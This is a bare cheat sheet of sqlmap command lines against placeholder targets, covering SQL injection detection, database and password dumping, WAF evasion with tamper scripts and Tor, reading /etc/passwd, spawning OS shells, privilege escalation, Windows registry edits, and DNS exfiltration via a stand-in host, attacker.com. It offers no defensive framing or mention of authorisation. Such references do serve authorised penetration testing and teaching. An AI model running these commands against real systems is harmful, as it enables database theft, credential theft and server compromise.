SQLMap Cheatsheet
The Ultimate SQL Injection Tool Reference Guide
Basic SQLMap Usage
sqlmap -u "http://example.com/page.php?id=1"
sqlmap -u "http://example.com" --check-waf
sqlmap -u "http://example.com/page.php?id=1" --dbs
sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
sqlmap -u "http://example.com/page.php?id=1" --batch
sqlmap -u "http://example.com/page.php?id=1" -v 3
sqlmap -u "http://example.com/page.php?id=1" --save
sqlmap --resume session_file
Target Specification
sqlmap -d "mysql://user:pass@host:port/dbname"
sqlmap -m targets.txt
sqlmap -g "inurl:index.php?id="
sqlmap -l logfile.log
sqlmap -r request.txt
sqlmap -u "http://example.com" --crawl=2
sqlmap -u "http://example.com" --sitemap=url
Request Configuration
sqlmap -u "http://example.com" --method=POST
sqlmap -u "http://example.com" --data="id=1"
sqlmap -u "http://example.com/page.php?id=1&cat=2" -p "id,cat"
sqlmap -u "http://example.com/page.php?id=1&cat=2" --skip="cat"
sqlmap -u "http://example.com" --cookie="id=1" --level=2
sqlmap -u "http://example.com" --user-agent="sqlmap" --level=3
sqlmap -u "http://example.com" --referer="http://google.com" --level=3
sqlmap -u "http://example.com" --headers="headers.txt"
sqlmap -u "http://example.com" --auth-type=BASIC --auth-cred="user:pass"
sqlmap -u "http://example.com" --proxy="http://127.0.0.1:8080"
sqlmap -u "http://example.com" --tor --tor-type=SOCKS5 --check-tor
sqlmap -u "http://example.com" --delay=1
sqlmap -u "http://example.com" --timeout=30
sqlmap -u "http://example.com" --retries=3
sqlmap -u "http://example.com" --random-agent
sqlmap -u "http://example.com" --host="custom.example.com"
Database Enumeration
sqlmap -u "http://example.com" --current-user
sqlmap -u "http://example.com" --current-db
sqlmap -u "http://example.com" --hostname
sqlmap -u "http://example.com" --is-dba
sqlmap -u "http://example.com" --users
sqlmap -u "http://example.com" --privileges
sqlmap -u "http://example.com" --passwords
sqlmap -u "http://example.com" --roles
sqlmap -u "http://example.com" --dbs
sqlmap -u "http://example.com" -D database_name --tables
sqlmap -u "http://example.com" -D database_name -T table_name --columns
sqlmap -u "http://example.com" -D database_name -T table_name --dump
sqlmap -u "http://example.com" -D database_name -T table_name -C column1,column2 --dump
sqlmap -u "http://example.com" -D database_name -T table_name --count
sqlmap -u "http://example.com" --schema
sqlmap -u "http://example.com" --search -T user
sqlmap -u "http://example.com" --comments
sqlmap -u "http://example.com" --banner
Injection Techniques
sqlmap -u "http://example.com" --technique=BEUSTQ
sqlmap -u "http://example.com" --technique=B
sqlmap -u "http://example.com" --technique=E
sqlmap -u "http://example.com" --technique=U
sqlmap -u "http://example.com" --technique=S
sqlmap -u "http://example.com" --technique=T
sqlmap -u "http://example.com" --technique=Q
sqlmap -u "http://example.com" --second-order="http://example.com/response.php"
sqlmap -u "http://example.com/page.php?id=1&cat=2" -p "id"
sqlmap -u "http://example.com/page.php?id=1&cat=2" --skip="cat"
sqlmap -u "http://example.com/page.php?id=1*" --prefix="'" --suffix="AND '1'='1"
sqlmap -u "http://example.com" --tamper="between.py,randomcase.py"
sqlmap -u "http://example.com" --level=3 --risk=3
Optimization Options
sqlmap -u "http://example.com" --predict-output
sqlmap -u "http://example.com" --keep-alive
sqlmap -u "http://example.com" --null-connection
sqlmap -u "http://example.com" --threads=5
sqlmap -u "http://example.com" -o
sqlmap -u "http://example.com" --force-dns
sqlmap -u "http://example.com" --fresh-queries
Injection Options
sqlmap -u "http://example.com" --fingerprint
sqlmap -u "http://example.com" --string="Welcome back"
sqlmap -u "http://example.com" --not-string="Error"
sqlmap -u "http://example.com" --regexp="Welcome \w+"
sqlmap -u "http://example.com" --code=200
sqlmap -u "http://example.com" --text-only
sqlmap -u "http://example.com" --titles
sqlmap -u "http://example.com" --union-cols=17-23
sqlmap -u "http://example.com" --union-char=123
sqlmap -u "http://example.com" --union-from=users
sqlmap -u "http://example.com" --dns-domain=attacker.com
Brute Force Options
sqlmap -u "http://example.com" --common-tables
sqlmap -u "http://example.com" --common-columns
sqlmap -u "http://example.com" --common-files
sqlmap -u "http://example.com" --charset="0123456789abcdef"
File System Access
sqlmap -u "http://example.com" --file-read="/etc/passwd"
sqlmap -u "http://example.com" --file-write="local.txt" --file-dest="/remote/path/remote.txt"
sqlmap -u "http://example.com" --list-directories="C:/"
Operating System Access
sqlmap -u "http://example.com" --os-shell
sqlmap -u "http://example.com" --os-pwn
sqlmap -u "http://example.com" --os-cmd="id"
sqlmap -u "http://example.com" --os-bof
sqlmap -u "http://example.com" --priv-esc
sqlmap -u "http://example.com" --msf-path=/opt/metasploit
Windows-Specific Options
sqlmap -u "http://example.com" --reg-read
sqlmap -u "http://example.com" --reg-add
sqlmap -u "http://example.com" --reg-del
sqlmap -u "http://example.com" --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft"
sqlmap -u "http://example.com" --reg-value="InstallPath"
sqlmap -u "http://example.com" --reg-data="C:\Program Files"
sqlmap -u "http://example.com" --reg-type="REG_SZ"
Miscellaneous Options
sqlmap -u "http://example.com" --parse-errors
sqlmap -u "http://example.com" --cleanup
sqlmap -u "http://example.com" --flush-session
sqlmap -u "http://example.com" --check-internet
sqlmap -u "http://example.com" --alert="ALERT"
sqlmap -u "http://example.com" --answers="follow=Y"
sqlmap -u "http://example.com" --beep
sqlmap -u "http://example.com" --dependencies
sqlmap -u "http://example.com" --disable-coloring
sqlmap -u "http://example.com" --gpage=2
sqlmap -u "http://example.com" --page-compare
sqlmap -u "http://example.com" --skip-waf
sqlmap -u "http://example.com" --smart
sqlmap --sqlmap-shell
sqlmap --wizard